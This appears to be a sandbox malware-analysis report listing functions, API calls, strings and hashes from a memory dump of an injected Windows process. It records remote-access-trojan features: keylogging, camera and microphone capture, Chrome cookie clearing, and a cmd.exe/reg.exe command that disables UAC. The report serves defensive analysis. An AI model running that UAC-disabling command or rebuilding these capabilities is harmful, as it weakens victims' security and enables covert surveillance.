                                                          Yara matches
                                                          Similarity
                                                          • API ID: DeleteErrorFileLast
                                                          • String ID: [Chrome Cookies found, cleared!]$[Chrome Cookies not found]$UserProfile$\AppData\Local\Google\Chrome\User Data\Default\Cookies
                                                          • API String ID: 2018770650-304995407
                                                          • Opcode ID: a567ecc9acc289fa8df8c100f72498e1e940fa7d7e5cebc9090abcd729cf0a68
                                                          • Instruction ID: 577f01c1ca91cde7873902714a87e5dfc81c41ede6786da5cdf0e2af074ca2ce
                                                          • Opcode Fuzzy Hash: a567ecc9acc289fa8df8c100f72498e1e940fa7d7e5cebc9090abcd729cf0a68
                                                          • Instruction Fuzzy Hash: E301D632E8410D5A7F04FBB5DC169BE772AAD216D8B400129D717932D4FE4289598BD2
                                                          Function 02FCAB5C Relevance: 9.3, APIs: 6, Instructions: 284COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • __allrem.LIBCMT ref: 02FCACE9
                                                          • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 02FCAD05
                                                          • __allrem.LIBCMT ref: 02FCAD1C
                                                          • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 02FCAD3A
                                                          • __allrem.LIBCMT ref: 02FCAD51
                                                          • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 02FCAD6F
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.4510477768.0000000002F90000.00000040.00000400.00020000.00000000.sdmp, Offset: 02F90000, based on PE: true
                                                          • Associated: 00000007.00000002.4510477768.0000000003008000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_2f90000_colorcpl.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@
                                                          • String ID:
                                                          • API String ID: 1992179935-0
                                                          • Opcode ID: 3b7debe300bd30616e6d17b60b5e1d5511deed8aaa3e59a787e888dcedb96ab2
                                                          • Instruction ID: 862de2926c1cdc5237c1378fa0c79c6017913c157262b45ccbd0ba43181ce37e
                                                          • Opcode Fuzzy Hash: 3b7debe300bd30616e6d17b60b5e1d5511deed8aaa3e59a787e888dcedb96ab2
                                                          • Instruction Fuzzy Hash: 4B81FB76E00B0B5BE7259E78CD41B6AB3AADF407E4F34452EE712D6680EB74E9018F50
                                                          Function 02FD597A Relevance: 9.2, APIs: 6, Instructions: 200COMMONLIBRARYCODE
                                                          Download Yara Rule
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.4510477768.0000000002F90000.00000040.00000400.00020000.00000000.sdmp, Offset: 02F90000, based on PE: true
                                                          • Associated: 00000007.00000002.4510477768.0000000003008000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_2f90000_colorcpl.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: __cftoe
                                                          • String ID:
                                                          • API String ID: 4189289331-0
                                                          • Opcode ID: 0bf38ba6c5c8d666e0c9e3e24f2f05e6aa72e68d51e438e7ab063766f4c391cc
                                                          • Instruction ID: 30b970ed154b3427a63cf05052fccb167628b896d9572199f88f1083a470e773
                                                          • Opcode Fuzzy Hash: 0bf38ba6c5c8d666e0c9e3e24f2f05e6aa72e68d51e438e7ab063766f4c391cc
                                                          • Instruction Fuzzy Hash: AC510B72D00205ABDB249B688C81FAE77ABEF483F4FAC421EEA15D61D1DB31C504DE64
                                                          Function 02FD75F1 Relevance: 9.1, APIs: 3, Strings: 2, Instructions: 389COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.4510477768.0000000002F90000.00000040.00000400.00020000.00000000.sdmp, Offset: 02F90000, based on PE: true
                                                          • Associated: 00000007.00000002.4510477768.0000000003008000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_2f90000_colorcpl.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: __freea$__alloca_probe_16_free
                                                          • String ID: a/p$am/pm
                                                          • API String ID: 2936374016-3206640213
                                                          • Opcode ID: b90b22e5a336c111d3cb6f34f78d18cd024f637f6bd2d0d27014bfb2a3056467
                                                          • Instruction ID: fd97a4bacfed99c7695a69f49c2b89028cd2bb19b83707b07b174ac650c19c42
                                                          • Opcode Fuzzy Hash: b90b22e5a336c111d3cb6f34f78d18cd024f637f6bd2d0d27014bfb2a3056467
                                                          • Instruction Fuzzy Hash: 1FD1D332E00206CADB29BF68C855BBAF7B3EF05384F2C455ADB05AF254D3359A41CB91
                                                          Function 02FD8295 Relevance: 9.0, APIs: 6, Instructions: 50COMMONLIBRARYCODE
                                                          Download Yara Rule
                                                          APIs
                                                          • GetLastError.KERNEL32(00000020,?,02FCA875,?,?,?,02FCF9F8,?,?,00000020,00000000,?,?,?,02FBDD92,0000003B), ref: 02FD8299
                                                          • _free.LIBCMT ref: 02FD82CC
                                                          • _free.LIBCMT ref: 02FD82F4
                                                          • SetLastError.KERNEL32(00000000,02FCF9F8,?,?,00000020,00000000,?,?,?,02FBDD92,0000003B,?,00000041,00000000,00000000), ref: 02FD8301
                                                          • SetLastError.KERNEL32(00000000,02FCF9F8,?,?,00000020,00000000,?,?,?,02FBDD92,0000003B,?,00000041,00000000,00000000), ref: 02FD830D
                                                          • _abort.LIBCMT ref: 02FD8313
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.4510477768.0000000002F90000.00000040.00000400.00020000.00000000.sdmp, Offset: 02F90000, based on PE: true
                                                          • Associated: 00000007.00000002.4510477768.0000000003008000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_2f90000_colorcpl.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: ErrorLast$_free$_abort
                                                          • String ID:
                                                          • API String ID: 3160817290-0
                                                          • Opcode ID: 7dc4e97bbdd51681f121e7a1f161c008af495bc94782c1a539d725d6d1f0dbf8
                                                          • Instruction ID: b5dea79231078891a737fa9bceda62667cf52fcf8a94018cff17b91ed7267954
                                                          • Opcode Fuzzy Hash: 7dc4e97bbdd51681f121e7a1f161c008af495bc94782c1a539d725d6d1f0dbf8
                                                          • Instruction Fuzzy Hash: F2F0A476981A007BD716B638BC08F6B361B8FC27E6F2D0514FB18D61C1EF6488039964
                                                          Function 02FAAB37 Relevance: 9.0, APIs: 6, Instructions: 45serviceCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • OpenSCManagerW.ADVAPI32(00000000,00000000,00000020,00000000,00000001,?,?,?,?,?,?,02FAA6B4,00000000), ref: 02FAAB46
                                                          • OpenServiceW.ADVAPI32(00000000,00000000,00000020,?,?,?,?,?,?,02FAA6B4,00000000), ref: 02FAAB5A
                                                          • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,02FAA6B4,00000000), ref: 02FAAB67
                                                          • ControlService.ADVAPI32(00000000,00000001,?,?,?,?,?,?,?,02FAA6B4,00000000), ref: 02FAAB76
                                                          • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,02FAA6B4,00000000), ref: 02FAAB88
                                                          • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,02FAA6B4,00000000), ref: 02FAAB8B
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.4510477768.0000000002F90000.00000040.00000400.00020000.00000000.sdmp, Offset: 02F90000, based on PE: true
                                                          • Associated: 00000007.00000002.4510477768.0000000003008000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_2f90000_colorcpl.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Service$CloseHandle$Open$ControlManager
                                                          • String ID:
                                                          • API String ID: 221034970-0
                                                          • Opcode ID: 7892c50add29787cd404a2972a6d5b61bce4ded9c4cc338c974384f633514d32
                                                          • Instruction ID: ef7181083abba7ec0c900c49914601c68a682cd3fe8896d8cdeff512c666bb98
                                                          • Opcode Fuzzy Hash: 7892c50add29787cd404a2972a6d5b61bce4ded9c4cc338c974384f633514d32
                                                          • Instruction Fuzzy Hash: B2F0F63198122CBBDB12AA359C48EFF7B7CDB45AE0F400056FF0986141EBA48D15C9F0
                                                          Function 02FAB71B Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 91COMMON
                                                          Download Yara Rule
                                                          APIs
                                                            • Part of subcall function 02FA3656: RegOpenKeyExW.ADVAPI32(80000001,00000400,00000000,00020019,?,030050E4), ref: 02FA3678
                                                            • Part of subcall function 02FA3656: RegQueryValueExW.ADVAPI32(?,02F9F34E,00000000,00000000,?,00000400), ref: 02FA3697
                                                            • Part of subcall function 02FA3656: RegCloseKey.ADVAPI32(?), ref: 02FA36A0
                                                            • Part of subcall function 02FAC048: GetCurrentProcess.KERNEL32(?,?,?,02F9DAE5,WinDir,00000000,00000000), ref: 02FAC059
                                                          • _wcslen.LIBCMT ref: 02FAB7F4
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.4510477768.0000000002F90000.00000040.00000400.00020000.00000000.sdmp, Offset: 02F90000, based on PE: true
                                                          • Associated: 00000007.00000002.4510477768.0000000003008000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_2f90000_colorcpl.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: CloseCurrentOpenProcessQueryValue_wcslen
                                                          • String ID: .exe$http\shell\open\command$program files (x86)\$program files\
                                                          • API String ID: 37874593-4246244872
                                                          • Opcode ID: 436c4d1065b5dfa623b7b8612524612799fc1701a574415537200485967351f4
                                                          • Instruction ID: 6ca50fac5f74307ef51f4fbf5ac039581b20f40ccdac160c726f733376c1321c
                                                          • Opcode Fuzzy Hash: 436c4d1065b5dfa623b7b8612524612799fc1701a574415537200485967351f4
                                                          • Instruction Fuzzy Hash: 5B218B72B0010867EF14FAB48C91EBE775F9F447E4F14047DE716A7290EE249D094A60
                                                          Function 02F9B19F Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 68timeCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • GetLocalTime.KERNEL32(?,Offline Keylogger Started,?), ref: 02F9B1AD
                                                          • wsprintfW.USER32 ref: 02F9B22E
                                                            • Part of subcall function 02F9A671: SetEvent.KERNEL32(?,?,00000000,02F9B245,00000000), ref: 02F9A69D
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.4510477768.0000000002F90000.00000040.00000400.00020000.00000000.sdmp, Offset: 02F90000, based on PE: true
                                                          • Associated: 00000007.00000002.4510477768.0000000003008000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_2f90000_colorcpl.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: EventLocalTimewsprintf
                                                          • String ID: [%04i/%02i/%02i %02i:%02i:%02i $Offline Keylogger Started$]
                                                          • API String ID: 1497725170-248792730
                                                          • Opcode ID: fede40a8b8ee8d12a3d1cb1efacab5fc25ca93641c1bd269de6fa8f7a722f3f3
                                                          • Instruction ID: 2f019a879d5ac63b279ac401c7557abad98ec71b2af2e50eac1d92d2ce944d82
                                                          • Opcode Fuzzy Hash: fede40a8b8ee8d12a3d1cb1efacab5fc25ca93641c1bd269de6fa8f7a722f3f3
                                                          • Instruction Fuzzy Hash: 0811967240011DAADF19FB94EC508FF77BDAE48391B00012EF60696190FF745A45CFA4
                                                          Function 02FAD5A0 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 57registryCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • RegisterClassExA.USER32(00000030), ref: 02FAD5EC
                                                          • CreateWindowExA.USER32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,000000FD,00000000,00000000,00000000), ref: 02FAD607
                                                          • GetLastError.KERNEL32 ref: 02FAD611
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.4510477768.0000000002F90000.00000040.00000400.00020000.00000000.sdmp, Offset: 02F90000, based on PE: true
                                                          • Associated: 00000007.00000002.4510477768.0000000003008000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_2f90000_colorcpl.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: ClassCreateErrorLastRegisterWindow
                                                          • String ID: 0$MsgWindowClass
                                                          • API String ID: 2877667751-2410386613
                                                          • Opcode ID: 6bcc75a61001c83b004135a69649ff0dff2ee5f506a779fa8eb1c61547075aff
                                                          • Instruction ID: daf6c329446220b4b076bde3c2b28ae6c3421c4ba93f2bb3ed93e83e050b0a42
                                                          • Opcode Fuzzy Hash: 6bcc75a61001c83b004135a69649ff0dff2ee5f506a779fa8eb1c61547075aff
                                                          • Instruction Fuzzy Hash: 5E01E5B1D0021DABDB11DFA9DC849EFBBBCEE04294F40092AFA14A6240EB7159058AB0
                                                          Function 02F97790 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 43processCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • CreateProcessA.KERNEL32(C:\Windows\System32\cmd.exe,/k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f,00000000,00000000,00000000,08000000,00000000,00000000,?,?), ref: 02F977D6
                                                          • CloseHandle.KERNEL32(?), ref: 02F977E5
                                                          • CloseHandle.KERNEL32(?), ref: 02F977EA
                                                          Strings
                                                          • C:\Windows\System32\cmd.exe, xrefs: 02F977D1
                                                          • /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f, xrefs: 02F977CC
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.4510477768.0000000002F90000.00000040.00000400.00020000.00000000.sdmp, Offset: 02F90000, based on PE: true
                                                          • Associated: 00000007.00000002.4510477768.0000000003008000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_2f90000_colorcpl.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: CloseHandle$CreateProcess
                                                          • String ID: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f$C:\Windows\System32\cmd.exe
                                                          • API String ID: 2922976086-4183131282
                                                          • Opcode ID: 50663cd1b30f99f251587c7e0b9f85813b3893ace95af4ab20a0aae629f331ad
                                                          • Instruction ID: 7e24bfc3e010b735b236cb0bee02a33ff50ba77e6819c892c06af7a4172766a6
                                                          • Opcode Fuzzy Hash: 50663cd1b30f99f251587c7e0b9f85813b3893ace95af4ab20a0aae629f331ad
                                                          • Instruction Fuzzy Hash: F3F090B2D4029C7ADB20AAD69C0DEDFBF3DEBC2B90F00051AFB04E6104EA705410CAB0
                                                          Function 02FD33DA Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 38libraryloaderCOMMONLIBRARYCODE
                                                          Download Yara Rule
                                                          APIs
                                                          • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,02FD338B,?,?,02FD332B,?), ref: 02FD33FA
                                                          • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 02FD340D
                                                          • FreeLibrary.KERNEL32(00000000,?,?,?,02FD338B,?,?,02FD332B,?), ref: 02FD3430
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.4510477768.0000000002F90000.00000040.00000400.00020000.00000000.sdmp, Offset: 02F90000, based on PE: true
                                                          • Associated: 00000007.00000002.4510477768.0000000003008000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_2f90000_colorcpl.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: AddressFreeHandleLibraryModuleProc
                                                          • String ID: CorExitProcess$mscoree.dll
                                                          • API String ID: 4061214504-1276376045
                                                          • Opcode ID: 909481b0a463e27e4fb6316aaaff88acb3fa131439dcaff18d3b74e0166b0fa6
                                                          • Instruction ID: bc30c0839b75b31a14d9d1a0d132131f37af88c2b57beb562a16ecf9a5f05a3a
                                                          • Opcode Fuzzy Hash: 909481b0a463e27e4fb6316aaaff88acb3fa131439dcaff18d3b74e0166b0fa6
                                                          • Instruction Fuzzy Hash: D6F0A430D4020DFBDF129FA0DC08B9DBFB9EB08795F0040A8FA06A6140DBB59A50CB91
                                                          Function 02F950E4 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 35synchronizationCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,03004EF8,02F94E7A,00000001,?,00000000,03004EF8,02F94CA8,00000000,?,?,?), ref: 02F95120
                                                          • SetEvent.KERNEL32(?,?,00000000,03004EF8,02F94CA8,00000000,?,?,?), ref: 02F9512C
                                                          • WaitForSingleObject.KERNEL32(?,000000FF,?,00000000,03004EF8,02F94CA8,00000000,?,?,?), ref: 02F95137
                                                          • CloseHandle.KERNEL32(?,?,00000000,03004EF8,02F94CA8,00000000,?,?,?), ref: 02F95140
                                                            • Part of subcall function 02FAB580: GetLocalTime.KERNEL32(00000000), ref: 02FAB59A
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.4510477768.0000000002F90000.00000040.00000400.00020000.00000000.sdmp, Offset: 02F90000, based on PE: true
                                                          • Associated: 00000007.00000002.4510477768.0000000003008000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_2f90000_colorcpl.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Event$CloseCreateHandleLocalObjectSingleTimeWait
                                                          • String ID: KeepAlive | Disabled
                                                          • API String ID: 2993684571-305739064
                                                          • Opcode ID: 0507d54bdd386c22659145e6a6eae845797c743fd094d9a9eb9febc23918d464
                                                          • Instruction ID: a395ceee57c63f5b38fe8343fa3a7559c91a13d42489e60c7d7033a665151c92
                                                          • Opcode Fuzzy Hash: 0507d54bdd386c22659145e6a6eae845797c743fd094d9a9eb9febc23918d464
                                                          • Instruction Fuzzy Hash: 36F0BBB5D44300BFFF223B748D0A5AABF99AB02794F00091DEA9382661D9618850CF61
                                                          Function 02FD13EA Relevance: 7.7, APIs: 5, Instructions: 222COMMONLIBRARYCODE
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.4510477768.0000000002F90000.00000040.00000400.00020000.00000000.sdmp, Offset: 02F90000, based on PE: true
                                                          • Associated: 00000007.00000002.4510477768.0000000003008000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_2f90000_colorcpl.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: ab829546361a03fdc6b3388de326327632cd52c6c6396ffddc187682a0ea3cff
                                                          • Instruction ID: 882f89b562e12d04acf6f271e9426ba7dadb71b2a8ca46a1816cf9caee6e6e53
                                                          • Opcode Fuzzy Hash: ab829546361a03fdc6b3388de326327632cd52c6c6396ffddc187682a0ea3cff
                                                          • Instruction Fuzzy Hash: 1271C475E012169BDF219F95C884BBFBB7BEF463A4F1C0229E61967280D7709941CFA0
                                                          Function 02F94371 Relevance: 7.7, APIs: 1, Strings: 4, Instructions: 206sleepCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • Sleep.KERNEL32(00000000,02F9D29D), ref: 02F944C4
                                                            • Part of subcall function 02F94607: __EH_prolog.LIBCMT ref: 02F9460C
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.4510477768.0000000002F90000.00000040.00000400.00020000.00000000.sdmp, Offset: 02F90000, based on PE: true
                                                          • Associated: 00000007.00000002.4510477768.0000000003008000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_2f90000_colorcpl.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: H_prologSleep
                                                          • String ID: CloseCamera$FreeFrame$GetFrame$OpenCamera
                                                          • API String ID: 3469354165-3547787478
                                                          • Opcode ID: d34696ab805aaac32df8ca9a7f835ed15f9dc8b695e264a348c7fceeb829d1a0
                                                          • Instruction ID: 1f6370afe5efa09c5a6aa37a89fd969fe5ea66ba2a7749798f359aa8cc75a559
                                                          • Opcode Fuzzy Hash: d34696ab805aaac32df8ca9a7f835ed15f9dc8b695e264a348c7fceeb829d1a0
                                                          • Instruction Fuzzy Hash: 8351F371F042016BEE29FB749C18A6F3B5BAF957C4F000428EB0A57794EF349906CB92
                                                          Function 02FD93E5 Relevance: 7.7, APIs: 5, Instructions: 171timeCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • GetTimeZoneInformation.KERNEL32(?,00000000,00000000,00000000,?,02FEF244), ref: 02FD944F
                                                          • WideCharToMultiByte.KERNEL32(00000000,00000000,03002764,000000FF,00000000,0000003F,00000000,?,?), ref: 02FD94C7
                                                          • WideCharToMultiByte.KERNEL32(00000000,00000000,030027B8,000000FF,?,0000003F,00000000,?), ref: 02FD94F4
                                                          • _free.LIBCMT ref: 02FD943D
                                                            • Part of subcall function 02FD6802: RtlFreeHeap.NTDLL(00000000,00000000,?,02FE0CEF,?,00000000,?,00000000,?,02FE0F93,?,00000007,?,?,02FE14DE,?), ref: 02FD6818
                                                            • Part of subcall function 02FD6802: GetLastError.KERNEL32(?,?,02FE0CEF,?,00000000,?,00000000,?,02FE0F93,?,00000007,?,?,02FE14DE,?,?), ref: 02FD682A
                                                          • _free.LIBCMT ref: 02FD9609
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.4510477768.0000000002F90000.00000040.00000400.00020000.00000000.sdmp, Offset: 02F90000, based on PE: true
                                                          • Associated: 00000007.00000002.4510477768.0000000003008000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_2f90000_colorcpl.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: ByteCharMultiWide_free$ErrorFreeHeapInformationLastTimeZone
                                                          • String ID:
                                                          • API String ID: 1286116820-0
                                                          • Opcode ID: dfb067f21bf423470d7acacc8343f2221153580ecfdecc5c6866a3bd4a022509
                                                          • Instruction ID: ffbac3f1a3e70ac03d82d75e88f85bdf62a5d500cfbbf5d1ce4602f70e919d5f
                                                          • Opcode Fuzzy Hash: dfb067f21bf423470d7acacc8343f2221153580ecfdecc5c6866a3bd4a022509
                                                          • Instruction Fuzzy Hash: 6D510C71D002099FCB10EFF4DD849AEB7BEEF457A4F18066AD61897280D7B09941CF50
                                                          Function 02FE11AC Relevance: 7.6, APIs: 5, Instructions: 110COMMONLIBRARYCODE
                                                          Download Yara Rule
                                                          APIs
                                                          • MultiByteToWideChar.KERNEL32(?,00000000,?,00000000,00000000,00000000,02FBDD92,?,?,?,00000001,00000000,?,00000001,02FBDD92,02FBDD92), ref: 02FE11F9
                                                          • __alloca_probe_16.LIBCMT ref: 02FE1231
                                                          • MultiByteToWideChar.KERNEL32(?,00000001,?,00000000,00000000,02FBDD92,?,?,?,00000001,00000000,?,00000001,02FBDD92,02FBDD92,?), ref: 02FE1282
                                                          • GetStringTypeW.KERNEL32(00000001,00000000,00000000,00000001,?,?,?,00000001,00000000,?,00000001,02FBDD92,02FBDD92,?,00000002,00000000), ref: 02FE1294
                                                          • __freea.LIBCMT ref: 02FE129D
                                                            • Part of subcall function 02FD61B8: RtlAllocateHeap.NTDLL(00000000,02FC5349,?,?,02FC88C7,?,?,00000000,?,?,02F9DE9D,02FC5349,?,?,?,?), ref: 02FD61EA
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.4510477768.0000000002F90000.00000040.00000400.00020000.00000000.sdmp, Offset: 02F90000, based on PE: true
                                                          • Associated: 00000007.00000002.4510477768.0000000003008000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_2f90000_colorcpl.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: ByteCharMultiWide$AllocateHeapStringType__alloca_probe_16__freea
                                                          • String ID:
                                                          • API String ID: 313313983-0
                                                          • Opcode ID: cc0f5dbaaae98cab5da34d9ab8523c1e75828f8666fe825093a85e098d59c059
                                                          • Instruction ID: 41be10aab5a4143a45f13c5e5bcdf8d729dafeedd5b5c85e1ecb7caee93c231f
                                                          • Opcode Fuzzy Hash: cc0f5dbaaae98cab5da34d9ab8523c1e75828f8666fe825093a85e098d59c059
                                                          • Instruction Fuzzy Hash: 4B31E372E0021A9BDF269F66DC40DAF7BA6EB40790F044528ED09D7290E735DC61CFA0
                                                          Function 02F91BE9 Relevance: 7.6, APIs: 5, Instructions: 71COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • CreateDirectoryW.KERNEL32(00000000,00000000), ref: 02F91BF9
                                                          • waveInOpen.WINMM(03002AC0,000000FF,03002AA8,Function_00001D0B,00000000,00000000,00000024), ref: 02F91C8F
                                                          • waveInPrepareHeader.WINMM(03002A88,00000020), ref: 02F91CE3
                                                          • waveInAddBuffer.WINMM(03002A88,00000020), ref: 02F91CF2
                                                          • waveInStart.WINMM ref: 02F91CFE
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.4510477768.0000000002F90000.00000040.00000400.00020000.00000000.sdmp, Offset: 02F90000, based on PE: true
                                                          • Associated: 00000007.00000002.4510477768.0000000003008000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_2f90000_colorcpl.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: wave$BufferCreateDirectoryHeaderOpenPrepareStart
                                                          • String ID:
                                                          • API String ID: 1356121797-0
                                                          • Opcode ID: 88e574e461316c61e5d2b63aa0ef18527f61bcffddb6f0922d4bb13405dfb99e
                                                          • Instruction ID: 2a025efc26c0f57350fb20be621687c9d2b82cd4778f1ef608736857660e2bc4
                                                          • Opcode Fuzzy Hash: 88e574e461316c61e5d2b63aa0ef18527f61bcffddb6f0922d4bb13405dfb99e
                                                          • Instruction Fuzzy Hash: E8217F71A062019FDB25FF25E81C51A7BAEBF4A758F104C2AE209EB698DF7C0400CF25
                                                          Function 02FDF3DA Relevance: 7.6, APIs: 5, Instructions: 68COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • GetEnvironmentStringsW.KERNEL32 ref: 02FDF3E3
                                                          • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 02FDF406
                                                            • Part of subcall function 02FD61B8: RtlAllocateHeap.NTDLL(00000000,02FC5349,?,?,02FC88C7,?,?,00000000,?,?,02F9DE9D,02FC5349,?,?,?,?), ref: 02FD61EA
                                                          • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 02FDF42C
                                                          • _free.LIBCMT ref: 02FDF43F
                                                          • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 02FDF44E
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.4510477768.0000000002F90000.00000040.00000400.00020000.00000000.sdmp, Offset: 02F90000, based on PE: true
                                                          • Associated: 00000007.00000002.4510477768.0000000003008000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_2f90000_colorcpl.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap_free
                                                          • String ID:
                                                          • API String ID: 336800556-0
                                                          • Opcode ID: 8c50653bd774419c986ab593a55d71513eaf4a95c10a3ec43829d05f9b32db20
                                                          • Instruction ID: f82769e244c780195be0915021769f8ded31d2cab9430dd25d92bccf4f34ec95
                                                          • Opcode Fuzzy Hash: 8c50653bd774419c986ab593a55d71513eaf4a95c10a3ec43829d05f9b32db20
                                                          • Instruction Fuzzy Hash: 4D01DD72A012157F272215B6AD4CC7B79AFEEC7EE43580619FF05D7640DBA49D0285B0
                                                          Function 02FA119E Relevance: 7.6, APIs: 5, Instructions: 61COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • std::_Lockit::_Lockit.LIBCPMT ref: 02FA11AB
                                                          • int.LIBCPMT ref: 02FA11BE
                                                            • Part of subcall function 02F9E0FC: std::_Lockit::_Lockit.LIBCPMT ref: 02F9E10D
                                                            • Part of subcall function 02F9E0FC: std::_Lockit::~_Lockit.LIBCPMT ref: 02F9E127
                                                          • std::_Facet_Register.LIBCPMT ref: 02FA11FE
                                                          • std::_Lockit::~_Lockit.LIBCPMT ref: 02FA1207
                                                          • __CxxThrowException@8.LIBVCRUNTIME ref: 02FA1225
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.4510477768.0000000002F90000.00000040.00000400.00020000.00000000.sdmp, Offset: 02F90000, based on PE: true
                                                          • Associated: 00000007.00000002.4510477768.0000000003008000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
